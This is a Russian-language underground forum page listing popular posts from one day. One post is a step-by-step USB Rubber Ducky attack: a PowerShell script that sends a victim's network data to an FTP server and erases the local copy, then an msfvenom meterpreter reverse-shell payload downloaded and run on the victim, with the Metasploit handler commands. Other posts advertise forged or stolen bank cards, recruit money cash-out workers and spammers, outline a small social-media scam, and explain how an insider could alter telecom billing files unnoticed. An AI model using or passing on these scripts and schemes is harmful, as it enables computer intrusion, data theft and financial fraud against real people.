Таблица лидеров
-
в Сообщения
- Все области
- Adverts
- Advert Questions
- Advert Reviews
- Файлы
- Комментарии к файлам
- Отзывы к файлам
- Записи блога
- Комментарии блога
- Изображения
- Комментарии к изображениям
- Отзывы к изображению
- Альбомы
- Комментарии к альбому
- Отзывы к альбому
- События
- Комментарии к событиям
- Отзывы к событиям
- Сообщения
- Статусы
- Ответы на статус
-
Пользовательская дата
-
Всё время
9 октября 2021 - 10 сентября 2025
-
Год
10 сентября 2024 - 10 сентября 2025
-
Месяц
10 августа 2025 - 10 сентября 2025
-
Неделя
3 сентября 2025 - 10 сентября 2025
-
Сегодня
10 сентября 2025
-
Пользовательская дата
27.10.2022 - 27.10.2022
-
Всё время
Популярные публикации
Отображаются публикации с наибольшей репутацией на 27.10.2022 в Сообщения
-
2 баллаЕсли вы считаете себя топовым соц инженером или же обладаете подвешенным языком, то эта старая но, до сих пор рабочая схема для Вас.
-
1 баллМобильные операторы получают массу данных и метаданных, по которым можно узнать очень многое о жизни отдельно взятого абонента. А поняв, как обрабатываются и как хранятся эти данные, ты сможешь отследить всю цепочку прохождения информации от звонка до списания денег. Если же говорить о модели внутреннего нарушителя, то здесь возможности и подавно огромные, ведь защита данных вообще не входит в задачи систем предбиллинга. Для начала нужно учитывать, что абонентский трафик в сети телеком-оператора генерируется и поступает с разного оборудования. Это оборудование может формировать файлы с записями (файлы CDR, логи RADIUS, текст в ASCII) и работать по разным протоколам (NetFlow, SNMP, SOAP). И нужно контролировать весь этот веселый и недружный хоровод, снимать данные, обрабатывать и передавать дальше в биллинговую систему в формате, который будет предварительно стандартизован. При этом везде бегают абонентские данные, доступ к которым желательно не предоставлять посторонним. Насколько защищена информация в такой системе с учетом всех цепочек? Давай разбираться. Зачем предбиллинг телеком-операторам? Считается, что абоненты хотят получать все более новые и современные виды услуг, но нельзя постоянно менять для этого оборудование. Поэтому реализацией новых услуг и способами их предоставления должен заниматься предбиллинг — это его первая задача. Вторая — анализ трафика, проверка его корректности, полноты загрузки в абонентский биллинг, подготовка данных для биллинга. С помощью предбиллинга реализованы различные сверки и дозагрузки данных. Например, сверка состояния услуг на оборудовании и в биллинге. Бывает, абонент пользуется услугами при том, что в биллинге он уже заблокирован. Либо он пользовался услугами, но с оборудования не поступили записи об этом. Ситуаций может быть множество, большинство таких моментов и решается с помощью предбиллинга. Когда-то я писал курсовую работу по оптимизации бизнес-процессов компании и расчету ROI. Проблема с расчетом ROI была не в том, что не было исходных данных, — я не понимал, какой «линейкой» их мерить. Примерно так же часто бывает с предбиллингом. Можно бесконечно настраивать и улучшать обработку, но всегда в какой-то момент обстоятельства и данные сложатся так, что произойдет исключение. Можно идеально выстроить систему работы и мониторинга вспомогательных систем биллинга и предбиллинга, но невозможно обеспечить бесперебойную работу оборудования и каналов передачи данных. Поэтому и существует дублирующая система, которая занимается проверкой данных в биллинге и данных, ушедших от предбиллинга в биллинг. Ее задача — поймать то, что ушло с оборудования, но по какой-то причине «не легло на абонента». Эту роль дублирующей и контролирующей предбиллинг системы обычно играет FMS — Fraud Management System. Конечно, ее основное предназначение — вовсе не контроль предбиллинга, а выявление мошеннических схем и, как следствие, мониторинг потерь и расхождений данных с оборудования и биллинговых данных. На самом деле вариантов использования предбиллинга очень много. Например, это может быть выполнение сверки между состоянием абонента на оборудовании и в CRM. Такая схема может выглядеть следующим образом. С помощью предбиллинга по SOAP получаем данные с оборудования (HSS, VLR, HLR, AUC, EIR). Преобразуем исходные RAW-данные в нужный формат. Делаем запрос в смежные системы CRM (базы данных, программные интерфейсы). Производим сверку данных. Формируем записи-исключения. Делаем запрос в систему CRM на синхронизацию данных. Итог — абонент, качающий фильм в роуминге в ЮАР, блокируется с нулевым балансом и не уходит в дикий минус. Еще один пример использования — накопление данных и дальнейшая их обработка. Такой вариант возможен, когда у нас тысячи записей с оборудования (GGSN-SGSN, телефония): выбрасывать все эти записи в детализацию абонента — полнейшее безумие, не говоря уже о том, что мы адски нагружаем все системы таким количеством мелких данных. По этой причине подойдет следующая схема, которая разрешает проблему. Получение данных с оборудования. Агрегация данных на предбиллинге (ждем, когда соберутся все нужные записи по какому-либо условию). Отправка данных в конечный биллинг. Итог — вместо 10 тысяч записей мы отправили одну с агрегирующим значением счетчика потребленного интернет-трафика. Сделали всего один запрос к базе данных и сэкономили кучу ресурсов, включая электричество! Это всего лишь типовые схемы работы. Формат статьи не позволяет привести примеры более сложных схем (например, Big Data), но они тоже встречаются. Как усмирить зоопарк? Чтобы было понятнее, как это работает и где здесь могут возникнуть проблемы, давай возьмем систему предбиллинга Hewlett-Packard Internet Usage Manager (HP IUM, в обновленном варианте eIUM) и на ее примере посмотрим, как работает подобный софт. Представь большую мясорубку, в которую бросают мясо, овощи, буханки хлеба — все, что только можно. То есть на входе самые разные продукты, но на выходе все они приобретают одинаковую форму. Мы можем поменять решетку и получим на выходе другую форму, но принцип и путь обработки наших продуктов останется прежний — шнек, нож, решетка. Это и есть классическая схема предбиллинга: сбор, обработка и вывод данных. В предбиллинге IUM звенья этой цепочки называются encapsulator, aggregator и datastore. Тут необходимо понимать, что на входе у нас должна присутствовать полнота данных — некий минимальный объем информации, без которого дальнейшая обработка бесполезна. При отсутствии какого-то блока или элемента данных мы получаем ошибку или предупреждение, что обработка невозможна, так как операции не могут быть выполнены без этих данных. Поэтому очень важно, чтобы оборудование формировало файлы-записи, которые имели бы строго определенный и установленный производителем набор и тип данных. Каждый тип оборудования — отдельный обработчик (коллектор), который работает только со своим форматом входных данных. Например, нельзя просто так взять и закинуть файл с оборудования CISCO PGW-SGW с интернет-трафиком мобильных абонентов на коллектор, который обрабатывает поток с оборудования фиксированной связи Iskratel Si3000. Если мы так сделаем, то в лучшем случае получим исключение при обработке, а в худшем у нас встанет вся обработка конкретного потока, так как обработчик-коллектор упадет с ошибкой и будет ждать, пока мы не решим проблему с «битым» с его точки зрения файлом. Здесь можно заметить, что все системы предбиллинга, как правило, критично воспринимают данные, на обработку которых не был настроен конкретный обработчик-коллектор. Изначально поток разобранных данных (RAW) формируется на уровне энкапсулятора и уже здесь же может быть подвергнут преобразованиям и фильтрации. Так делается, если нужно до схемы агрегации произвести с потоком изменения, которые должны быть в дальнейшем применены ко всему потоку данных (когда он будет проходить через различные схемы агрегации). Файлы (.cdr, .log и прочие) с записями об активности пользователей-абонентов поступают как с локальных источников, так и с удаленных (FTP, SFTP), возможны варианты работы и по другим протоколам. Разбирает файлы парсер, с помощью разных классов Java. Так как система предбиллинга в нормальном режиме работы не предназначена для хранения истории обрабатываемых файлов (а их может быть сотни тысяч в сутки), то после обработки файл на источнике удаляется. По разным причинам файл не всегда может быть удален корректно. В результате бывает, что записи из файла обрабатываются повторно или с большим опозданием (когда удалить файл получилось). Для предотвращения таких дублей существуют механизмы защиты: проверка на дубли файлов или записей, проверка на время в записях и прочее. Одно из самых уязвимых мест здесь — это критичность к размеру данных. Чем больше мы храним данных (в памяти, в базах данных), тем медленнее мы обрабатываем новые данные, тем больше мы потребляем ресурсов и в итоге все равно достигаем предела, после которого вынуждены удалить старые данные. Таким образом, для хранения этих метаданных обычно используются вспомогательные БД (MySQL, TimesTen, Oracle и так далее). Соответственно, получаем еще одну систему, которая влияет на работу предбиллинга с вытекающими вопросами безопасности. Что в черном ящике? Когда-то на заре подобных систем использовались языки, которые позволяли эффективно работать с регулярными выражениями, — таким, например, был Perl. Фактически почти весь предбиллинг, если не брать во внимание работу с внешними системами, — это правила разбора-преобразования строк. Естественно, лучше регулярных выражений тут ничего не найти. Постоянно растущий объем данных и повышение критичности к времени вывода новой услуги на рынок сделали применение таких систем невозможным, так как тестирование и внесение изменений занимало много времени, масштабируемость была низкой. Современный предбиллинг — это набор модулей, как правило написанных на Java, которыми можно управлять в графическом интерфейсе с помощью стандартных операций копирования, вставки, перемещения, перетаскивания. Работа в этом интерфейсе проста и понятна. Для работы в основном используется операционная система на базе Linux или Unix, реже — Windows. Основные проблемы обычно связаны с процессом тестирования или выявления ошибок, так как данные проходят по множеству цепочек правил и обогащаются данными из других систем. Видеть, что происходит с ними на каждой стадии, не всегда удобно и понятно. Поэтому приходится искать причину, отлавливая изменения нужных переменных при помощи логов. Слабость этой системы — ее сложность и человеческий фактор. Любое исключение провоцирует потерю данных или неправильное их формирование. Обрабатываются данные последовательно. Если на входе у нас ошибка-исключение, которая не позволяет корректно принять и обработать данные, встает весь входной поток либо порция некорректных данных отбрасывается. Разобранный RAW-поток поступает на следующую стадию — агрегацию. Схем агрегации может быть несколько, и они изолированы друг от друга. Как если единый поток воды, поступающий в душ, пройдя через решетку лейки, разделится на разные потоки — одни толстые, другие совсем тонкие. После агрегации данные готовы к доставке потребителю. Доставка может идти как напрямую в базы данных, так и записью в файл и отправкой его дальше либо просто записью в хранилище предбиллинга, где они будут лежать, пока его не опустошат. После обработки на первом уровне данные могут передаваться на второй и далее. Такая лестница необходима для увеличения скорости обработки и распределения нагрузки. На второй стадии к нашему потоку данных может добавляться другой поток, смешиваться, делиться, копироваться, объединяться и так далее. Конечная стадия — это всегда доставка данных в системы, которые его потребляют. В задачи предбиллинга не входит (и это правильно!): мониторить, поступили и доставлены ли входные-выходные данные, — этим должны заниматься отдельные системы; шифровать данные на любой стадии. Далеко не весь поток поступающих данных подвергается обработке. Обрабатываются только те данные, которые нужны для работы. Тратить время на остальные нет смысла до того момента, пока они не понадобятся. Таким образом, из RAW-потока нужно брать только то, что нужно для схем агрегации. Из RAW (текстовые файлы, результаты запросов, бинарные файлы) парсится только необходимое. Приватность Здесь у нас полный расколбас! Начнем с того, что в задачи предбиллинга не входит защита данных в принципе. Разграничение доступа к предбиллингу нужно и возможно на разных уровнях (интерфейс управления, операционная система), но если мы заставим его заниматься шифрованием данных, то сложность и время обработки настолько увеличатся, что это будет совершенно неприемлемо и непригодно для работы биллинга. Зачастую время от использования услуги до отображения этого факта в биллинге не должно превышать нескольких минут. Как правило, метаданные, которые нужны для обработки конкретной порции данных, хранятся в БД (MySQL, Oracle, Solid). Входные и выходные данные практически всегда лежат в директории конкретного потока-коллектора. Поэтому доступ к ним может иметь любой, кому он разрешен (например, root-пользователь). Сама конфигурация предбиллинга с набором правил, сведениях о доступах к базам данных, FTP и прочему хранится в зашифрованном виде в файловой базе данных. Если неизвестен логин-пароль для доступа в предбиллинг, то выгрузить конфигурацию не так просто. Любое внесение изменений в логику обработки (правила) фиксируется в лог-файл конфигурации предбиллинга (кто, когда и что менял). Даже если внутри предбиллинга данные передаются по цепочкам обработчиков-коллекторов напрямую (минуя выгрузку в файл), данные все равно временно хранятся в виде файла в директории обработчика, и при желании к нему можно получить доступ. Данные, которые проходят обработку на предбиллинге, обезличены: они не содержат ФИО, адресов и паспортных данных. Поэтому даже если ты получишь доступ к этой информации, то персональных данных абонента отсюда не узнать. Зато можно поймать какую-то инфу по конкретному номеру, IP либо другому идентификатору. Имея доступ к конфигурации предбиллинга, ты получаешь данные для доступа ко всем смежным системам, с которыми он работает. Как правило, доступ к ним ограничен непосредственно с сервера, на котором работает предбиллинг, но так бывает не всегда. Если ты доберешься до директорий, где хранятся файловые данные обработчиков, то сможешь вносить изменения в эти файлы, которые ждут своей отправки потребителям. Часто это самые обычные текстовые документы. Тогда картина такая: предбиллинг данные принял и обработал, но в конечную систему они не пришли — пропали в «черной дыре». И выяснить причину этих потерь будет сложно, так как потеряна только часть данных. В любом случае эмулировать потерю будет невозможно при дальнейшем поиске причин. Можно посмотреть данные на входе и выходе, но понять, куда они делись, не получится. Злоумышленнику при этом остается только замести следы в операционной системе.
-
1 балл
-
1 балл
-
1 баллсделать и как можно его применить. Сразу скажу, что сюжетов существует много и достаточно посмотреть на количество возможных вариантов. Они есть как под разные операционные системы, так и под задачи. Рассмотрим как на практике работают некоторые из них и как их можно использовать. Советую прочитать прошлые части Как сделать USB ducky? USB Ducky + WiFi Ducky Нужно понимать, что такого ряда атаки проводятся, когда у вас есть возможность каким-то образом передать или доставить наше устройство для жертвы. Я писал, что можно заказать флешку и упаковать наше чудо в небольшой и приятный корпус, который не будет вызывать подозрений. Удаленное получение информации о сети с PowerShell Что нам нужно: USB WiFi Ducky (связка Arduino Micro Pro и Wemos mini d1); Удаленный сервер с установленным FTP-сервером; Мобильное устройство. Базой нашего скрипта будут команды, которые позволяют получить информацию о сети. Очень подробно они описаны здесь. В нашем примере используем Get-NetIPConfiguration, аналог всем известной командыipconfig в командной строке Windows. Если вам нужно доработать скрипт или заточить под свои нужды, то посмотрите информацию по ссылке выше. Загрузка данных о сети нашей цели будет осуществляться на удаленный FTP-сервер. Для примера был выбран Golden FTP Server. Его также можно использовать и на локальной машине. Вы понимаете, что для серьезных задач нам нужен выделенный FTP-сервер. FTP Server Нажимаем “Добавить” и указываем путь для доступа к файлам. Ставим галочку “Разрешить полный доступ”. Приступаем к скрипту: ############################################ Get-NetIPConfiguration > ipdata.txt; #указываем файл для записи данных о сети $Dir="ipdata.txt" #указываем директорию FTP-сервера $ftp = "ftp://<FTP>" #указываем адрес FTP-сервера (текст в скобочках заменяется на адрес сервера) $webclient = New-Object System.Net.WebClient foreach($item in (dir $Dir "*.trc")){"uploading";$uri = New-Object System.Uri($ftp+$item.Name);$webclient.UploadFile($uri, $item.FullName)} #код для записи файла на сервер. Цикл foreach записан в строку del ipdata.txt #удаляем исходный файл с данными о сети ############################################ Скрипт можно предварительно протестировать на работоспособность в PowerShell. Далее перепишем скрипт в виде команд Ducky Script: GUI r DELAY 100 STRING powershell ENTER DELAY 1000 STRING Get-NetIPConfiguration > ipdata.txt;$Dir="ipdata.txt";$ftp = "ftp://127.0.0.1/F/";$webclient = New-Object System.Net.WebClient; ENTER STRING foreach($item in (dir $Dir "*.trc")){"uploading";$uri = New-Object System.Uri($ftp STRING + STRING $item.Name);$webclient.UploadFile($uri, $item.FullName)} ENTER STRING del ipdata.txt ENTER DELAY 100 STRING exit ENTER Также стоит отметить, что на разных компьютерах стоит использовать разные значения DELAY, то есть задержки между выполнением команд. С этим нужно экспериментировать. В ходе использования скрипта файл с информацией о сети передается на ваш FTP-сервер и удаляется с компьютера жертвы. Пример отчета можно увидеть на скриншоте. Файл с нашими данными ipdata.txt: Информация о жертве ipdata.txt Meterpreter С помощью USB Rubber Ducky мы можем использовать не только написанные на Ducky сценарии, но и загружать исполняемые файлы, которые смогут действовать сами по себе. Именно эту возможность мы разберем. Итак, для атаки нам понадобится: Машина под управлением Linux с установленным Metasploit Framework и Apache (лучше использовать выделенный сервер); Arduino Micro Pro в связке с Wemos mini d1, с установленной прошивкой для эксплуатации Ducky-скриптов; Машина под управлением Windows с поддержкой Powershell; Мобильное устройство с поддержкой WiFI. Итак, начнем. Шаг 1. Создание payload Для начала узнаем IP-адрес нашей машины с помощью команды ifconfig. Как видим, наш адрес — 192.168.0.x Создадим исполняемый файл .exe с помощью команды: msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.100 lport=5555 -f exe > / root/Desktop/reverse_tcp.exe После ввода команды получаем результат: После этого в папке root/Desktop создастся нужный файл. Шаг 2. Конфигурирование веб-сервера Запустим веб-сервер Apache 2 с помощью команды: service apache2 start Скопируем файл reverse_tcp.exe в директорию сервера: var/www/html Дальше проверяем работу сервера: введя свой IP в адресной строке браузера, увидим что-то похожее: Шаг 3. Работа с WiFi USB Ducky На данном этапе мы используем непосредственно нашу “уточку”. Для начала, взглянем на скрипт по ссылке. Желательно его отредактировать, убрав лишние пробелы и комментарии. После этого заменяем "service.jar" на название нашего payload, и IP-адрес на адрес нашего компьютера. Подключаем устройство, подключаемся к точке доступа “уточки” и загружаем полученный скрипт: Шаг 4. Атака Нажимаем на кнопку “Run Script”. На компьютере жертвы запускается окно “Выполнить”, затем вызов Powershell в фоновом режиме. После этого исполняемый файл с нашего сервера скачивается, запускается и закрывается процесс Powershell. Чтобы контролировать компьютер жертвы с управляющей машины, вводим команду msfconsole. После загрузки фреймворка выполняем такую последовательность команд: msf > use exploit/multi/handler msf exploit(handler) > set payload windows/meterpreter/reverse_tcp msf exploit(handler) > set lport 5555 msf exploit(handler) > exploit Если payload на компьютере жертвы сработал, вы увидите такую картину: После установки подключения вы сможете использовать все возможности платформы. Заключение Вот такими способами можно применять уточку. Также я хочу сказать, что можно использовать технологию загрузки с сервиса для других задач. Конечно, для проведения хорошей атаки нужно поработать с нагрузкой. Так как она обнаруживается антивирусами и поэтому имеет далеко не стопроцентный шанс. Но с использованием навыков СИ, например отправить сообщение в критичный момент для цели, может отлично сработать.
-
1 баллВсех приветсвую! Пердлогаю дебетовы АТМ карты Украины! В наличии имеються: Приват, А-банк, Дельта банк, Альфа банк, ПУМБ, VAB-банк, Юникредит, Правекс, Аваль, Русский стандарт, Сбербанк России, OTP-банк, Ощадбанк! Любые другие банки изготовим в течении суток БЕЗ предоплат!!! Цена 100-250$ за карту! Работаем исключительно через гаранта данного форума, предоплат не берем, с проверенными пользователями можем сработать по постоплате (получили, проверили материал, потом оплатили)!!! Высылаем карты по Украине и по России! Имееться много положительных отзывов!!!
-
1 баллНаш подписчик и участник форкс чата разработал свою схему, по которой можно заработать себе на пивко и семки. Далее с его слов. Я начал разрабатывать систему по заработку, она очень проста, но больше 1000 в день не заработаешь. Итак, нам понадобятся: Минимум 3 странички ВКонтакте Qiwi кошелёк Любой фоторедактор; Так вот, мы будем брать с людей небольшую сумму за наши услуги. Схема очень проста. На скриншотах, которые я скину после написания текста будет всё ясно. Вложения не нужны никакие, развод людей на стикеры от официальных групп очень прост, мало кто знает, что если скинуть в личные сообщения паблика какого-нибудь спортмастера или другой официальной группы(не все отвечают) ссылку на свою запись и попросить оставить комментарий, то они оставляют там стикер. Надо сделать как минимум 10 таких сиикеров на одной записи, после чего привлекать внимание людей в комментариях какого-нибудь форча такими фоточками которые я потом скину. Люди ведутся, спрашивают в личке как ты так сделал, ты отвечаешь что за некую сумму сделаешь один такой комментарий(я делал за 100 руб, хоть это очень мало), дальше просто скидываем в официальные группы ссылки на их записи и они их их оставляют (можно ждать даже 12 часов), клиент скидывает деньги и готово! Спрашивается, зачем фейк аккаунты? Просто некоторые группы, например, "Партия ЯБЛОКО" оставляет комментарий только один раз, кроме этой группы такого поведения не наблюдал.
-
1 баллТребуются Специалисты по выводу денежных средств, Спамеры. другие вакансии. Условия работы оговариваются при личном собеседовании. Требования: от 20 лет, опыт работы, наличие необходимой техники и оборудования. обращаться в телеграм: @kazza4ok
-
1 балл1. Мошенники в сети интернет Данный вид мошенников - это чума интернета. Мошенники есть везде, на каждом сайте. А в социальных сетях их пруд пруди. Т.к. их много, все они отличаются. Около 90% мошенников в социальных сетях - это школьники. Да да. Именно школьники, которые думают, что если кинуть человека на 100 рублей, то ничего не будет. В основном, данные особи "разводят по тупому". Самый популярный развод - это договорные матчи. Особь заходит на паблик со ставками, новостями спорта и т.д., выбирает жертву и пишет текст примерного содержания "Привет, есть инфа о договорных матчах. Каждую неделю есть матчи, цена ХХХХ, первый даю на проверку". Если отвечаете что заинтересованы - особь кидает матч, а так же "точный счёт матча", например, Динамо - СКА 2:1. Пишет особь многим людям, и конечно же, даёт разные исходы. Кому-нибудь попадается точный счёт, а далее идёт покупка второго. Тут всё понятно. Особь может не писать вам в ЛС, сейчас новый способ - лайк\репост вашей записи со страницы красивой девушки. Вы сами заходите на страницу особи и смотрите предложение. Второй вид - обычные. Это простые люди, захотевшие халявы. Могут кидануть вас на что угодно. Достаточно увидеть ваши товары (если есть), объявление о покупке\продаже и т.д. Кидают на доставку, товар. Такие люди тоже приматы, как и разводилы на "пополнение счёта". Не стоит о них много говорить. Так же есть самые опасные мошенники в соц. сетях - "друзья" и "любовь". Этот вид мошенников достаточно терпелив. Они втираются в доверие через игру (играете вместе в браузерку и т.д.), отношения (знакомства и т.д.). Могут вести себя нормально долгое время. Встречались такие, кто разводил через 2 года общения. Такие люди ведут активную жизнь в соц. сетях. Одновременно могут общаться с десятками людей. В определённый момент отношения просят что-нибудь купить или оплатить. Самое популярное сейчас - билеты в театр, покупка лекарств маме\бабушке и т.д. Суть: девушка пишет парню, они начинают общаться. Через пару дней\недель она намекает на встречи, а-ля хватит сидеть в ВК, давай в живую встретимся. Парень соглашается. Девушка говорит, что хочет в театр, и есть хороший сайт, где можно купить билеты дешевле. Хорошие билеты стоят дорого, а на сайте скидки до 50%. Кидает ссылку, парень покупает, и... в общем-то всё. Девушка пропадает. Парень только потом понимает, что сайт фейк. С лекарствами почти тоже самое. Девушка назначает встречу, а в последний момент у неё проблемы, срочно нужны деньги для лекарства дорогого, ведь бабка коньки отбросит. Сама купить не может, т.к. "тут любая причина". Скидывает фейк сайт. Говорит, что всё с сайта привозит курьер, оплата ему. Делает заказ, приезжает курьер, отдаёт флаконы с водой и уезжает. Классика. В сети много мошенников. Эти способы самые ходовые. 2. Слив ваших данных Господа, 21 век - век компьютерных технологий. Кредитовые, дебетовые карты есть практически у всех. А значит, работы для кардеров хоть отбавляй (кардеры - это современные "Робин Гуды", как себя они называют). Вы можете не знать, но потом окажется, что ваши данные были использованы для отмывания денег, заказов услуг, посылок, кредитов и т.д. В даркнете можно купить 100 паспортов за 500 рублей (дада), а можно вообще получить бесплатно, если по ним уже всё отработали. А откуда берут продавцы в даркнете? Тут всё гораздо труднее. Это могут быть сканы, которые люди скидывали для регистраций в букмекерских конторах, для оформления кредитов и т.д. Взламывают базы данных и вытягивают нужное. Зачастую, можно найти "полный комплект" данных. Там и паспорт, и водительское, и страховая, и аттестат, и даже грамоты за 10 класс. Уверяю вас, защита в банках не такая уж и сильная. Ваши данные легко становятся не вашими. В даркнете можно купить данные чужих банковских карт всего за пару баксов. Проверить карту на баланс тоже легко. Откуда ваши карты у мошенников? Ну тут много вариантов: недобросовестные кассиры, взлом базы данных интернет-магазинов (около 70%), взлом БД банка (очень редко, там другой уровень защиты, нежели в магазинах), скиммеры (в самом банкомате), прозвоны банков, трояны на сайтах и многое другое. Защититься очень сложно, тем более, что кардинг становится всё более популярным. Но хочу обрадовать вас - в СНГ данные воруют не часто. Ведь первое правило кардинга - никому не рассказывать о кардинге не работать по СНГ. Это из-за того, что ловят очень часто. Все привыкли работать по Америке, Европе, Азии. Т,к. там это обычно дело, и ответственность несут банки, а не владельцы карт. У нас же, наоборот. Очень часто "виноваты сами владельцы". Ещё немного о даркнете - "пробив" человека, т.е. полное досье, стоит от 200 до 1000 рублей. Там и адрес, и родственники, и машины, и кредитная линия. Зачастую, такую информацию предоставляют сотрудники полиции, желая подзаработать... Там же и отрисовка любых документов, взломы страничек ВК, продажа товаров со скидками (краденое), скидки на отели, авиабилеты, жд билеты, и даже поддельные документы гос. служащих (от оригинала почти не отличить). И это не реклама. За это дают хорошие сроки. Так чем же грозит вам потеря личных данных? Что могут сделать с помощью простого скана паспорта и карт? Да многое. Вот несколько способов получить профит со скана паспорта и карточек: Микрокредиты. Да, многие кредиторы требуют фотку паспорта в руках с лицом. Не проблема. За 100-200 рублей вам забабахают несколько нужных фоток. С одного сайта можно получить 50-100 баксов (было раньше так, суммы могут меняться). Отмывание денег. С карточки залили деньги в букмекерскую контору, покер-рум, поиграли, вывели на левый кошелёк (либо не левые, можно сделать кошель по данным, а с него в биткоины и всё). Способов много. 80% всех карт идёт на покупку в интернет магазинах. Заказал с левой карты айфончик на адрес, забрал посылочку и сидишь довольный. Но это только для профанов. На самом деле, там гемороя очень много, ведь магазины тоже усваивают урок. Авиа перелёты, депозиты в отелях, прокат авто, заказ еды. Да, это тоже можно сделать имея данные. Натыкался в даркнете на темы, где люди таким способом отдыхали на топовых курортах, по-соседству со звёздами и членами королевских семей. Если память не подводит, такая "поездка" обошлась в 1 лям американских денег. Чужих денег... Как же себя обезопасить? Могу дать лишь несколько советов: Покупайте только в проверенных интернет-магазинах, крупных магазинах. Проверяйте банкоматы на предмет лишних предметов (скиммеры). Не высылайте никому свои персональные данные, особенно сканы паспорта и других документов. Не ведитесь на скидки на авиаперелёты и депозиты в отелях, особенно в соц. сетях. Не посещайте подозрительные сайты и не скачивайте левое ПО (всякие читы, парсеры, и т.д. для заработка легких денег).
-
1 балл
-
1 балл
-
1 балл
-
1 балл
-
1 баллРазные имена носило это прекрасное заведение, но в памяти рожденных в СССР оно укоренилось как ЛТП (лечебно-трудовой профилакторий), или наркологический диспансер. Трудился я там в конце девяностых — начале нулевых. 90-е годы — это был самый разгар наркомании. Попадали к нам наркоманы от 12 (!) до 90 лет. Иногда целыми семейными подрядами. Цыганские семьи не удивляли вообще никого. Первом делом за поступившего берется приемный покой. Пациента опрашивают (если он может говорить), замеряют вес, рост, температуру, давление, проверяют на педикулез (вши) и отправляют в жуткого вида помещения — ванную. Там моют как вонючих бомжей, так и школьниц, которых родители поймали на «травке» и притащили «лечиться». Если пациент в силах ходить, за ним приходит кто-нибудь из персонала того отделения, в которое он был распределен. С этого момента антураж убогой больнички начинает меняться на тюремный. Длинные коридоры, множество дверей, решеток, решетчатых калиток, недобрые окрики персонала... По прибытию в отделение происходит процедура обыска, ощупывание швов, и конечно же, заглядывание в задницу. У женщин заглядывают еще кое-куда. Заставляем голым задом поприседать в коридоре, где пациент открыт взглядам всего отделения. И с этого момента вновь прибывший не только не сможет выйти на улицу по собственному желанию, но даже покурить не пойдёт, или в туалет. Вы возмутились? А вот успокойтесь. Если поступившего тщательно не осмотреть, эти фокусники могут пронести невообразимое количество наркотиков в естественных складках своего тела. А на нашей совести будет несколько смертей от передозировки. Как и в тюрьме, у нас есть множество «рецидивистов», которые проходят курс лечения далеко не по первому разу. Вы думаете, что если наркоман идет в наркологичку по собственному желанию, то он «мощь-пацан» и вообще охренительный борец со своим недугом? А вот нет! Наркоманы приходят сами в это заточение только для того, чтобы переломаться. Когда ломки закончатся, наркомана снова будет «торкать» маленькая доза, за сравнительно небольшие деньги. Когда он снова нагонит слоновью дозу — он снова придет к нам, если до этого не помрет. Итак, ведем новенького не в обычную палату, а в волшебную. Зверинец. Кунсткамера. Палата интенсивной терапии. Эдакая недореанимация. Там свой пост. Находиться там надо круглосуточно в составе двух человек минимум. Клиента раздеваем догола, кладем на обшитый клеенкой матрац, даем две простыни. Подушки запрещены. В туалет — только в сопровождении. Курить нельзя. Прием пищи — прямо в койках. Лежачих и привязанных кормим сами, иногда насильно. Вязки — главнейшая вещь в этом помещении. Стоит только клиенту «поплыть», как они становятся его лучшими друзьями на ближайшую неделю. Почему такая строгость и постоянный контроль? Когда алкоголик перестает пить после длительного запоя, через несколько дней к нему приходит «белочка». Не всегда, но как правило. И мы сидим, ждем. И всегда дожидаемся. Палата большая, на 20 коек, и всегда полная. И с каждой койки — свой концерт. У этого цыгане и собаки пришли, второй по батарее тихонько стучит, чертиков выгоняет. Третий залез на оконные решетки и с криком «тут летают души умерших детей» сверзился вниз. Не дай бог прозевать приход «белочки», потом будешь получать по полной за то, что у тебя пациенты травмированы. Тихих дурачков мало, почти все орут. К вечеру от бреда, ора, запаха испражнений начинает накрывать и тебя. — Доктор, у вас колибри на плече! — Да-да, хорошо. Но это вроде воробей. С попытками отшутиться начинаешь разговаривать с ними на равных. Ночь — самое тяжелое время. Активизируются все психозы, без исключения. Кто во что горазд. Слипаются глаза у дежурного, и под эту какофонию он отрубается. А в это время бывший уже пять дней в адекватном состоянии парень срывается с кровати и отвязывает самого буйного. Вот так, без причины, по наитию. И тощий, трясущийся, безумный наркоман вновь лезет по решеткам, просачивается через небольшой зазор и летит с четвертого этажа. В яблоневом саду, разбившись под окнами наркологии, лежит труп. На нем нет царапин, нет переломов, целая голова. Вот только внутри на куски разлетелись остатки печени, как потом скажут на вскрытии. Его несут обратно туда, откуда он так хотел вырваться, по тем же бетонным пролетам, где каждая щель заварена решетками. По коридорам проходных отделений, где покачают вслед головой, а потом забудут, да и примутся за старое местные обитатели. Слишком жарко, опасно оставлять в тепле тело человека, который начал гнить уже при жизни. Его оставляют на одном из лестничных пролетов, где до утра он будет смотреть незакрытыми глазами в осыпающуюся побелку потолка, пугая своим видом мимо проходящих медсестричек. В женском отделении ждет еще один труп, но пока еще живой. Она уже не первый месяц лежит в «кунсткамере». Совершенно безумная, истощенная. От длительного лежания у нее образовываются дичайшие пролежни, переходящие в сквозные гнойные дыры. Копчик, колени-локти, места выпирания тазовых костей, затылок — все это смердящие ямы. Через пару часов она составит компанию неудавшемуся беглецу. Утром на главном крыльце рыдает мужчина, бьется в истерике женщина — родители. У женщины, видимо, не оказалось близких. Мы садимся в «буханку», куда уже погрузили тело наркомана. Едем в морг. Скидываем с носилок труп на бетонную полку, под потолком раздается звук упавшей доски. Не доезжая до диспансера, слышим мат дежурного врача. Поступила мерзкая на вид алкашка, на руке грязный гипс. — Когда наложен гипс? — Не помню. Года два, наверное. Врач снимает гипс, оттуда падают белые опарыши. — Помните Ольку? Выписали неделю назад из женского. — Помним. — Так померла от передоза, на трассе, в машине под мужиком. Ей не было и пятнадцати лет... Снова поднимаемся к себе в отделение. Через мужское отделение идет на обед колонна женщин. — По правой стороне, б**! Это опять кто-то пытается заговорить, а то и забежать в палату к мужикам. Чаще всего попытки побега происходят на пути в столовую. В трусах и в сорочке, зимой, им всё равно. Сносят конвой в белых халатах и бегут. А ловить надо. Прохожие не помогают никогда. И дай бог, если они не сопротивляются при поимке. Тут все как в тюрьме, вполне можешь получить в бок заточку из ложки. Раньше позволяли свидания, теперь запретили. Слишком много возможностей для контрабанды. Девушка, поцеловав своего парня, передала изо рта в рот «чуток» героина. И это далеко не единичный случай. Теперь берем только «передачи», тщательно проверяем, читаем записки, строго наказываем за неожиданные находки и неправильные тексты. Иногда из «кунсткамеры» попадаются целые алмазы. Все отделения ходили смотреть на барышню неполных 30 килограмм, которая проснулась после запоя с бомжами в подвале, а никого нет, и дверь заперта. Криков никто не слышал, сидела она там почти два месяца. Кстати, оголенными костями и смердящими язвами не 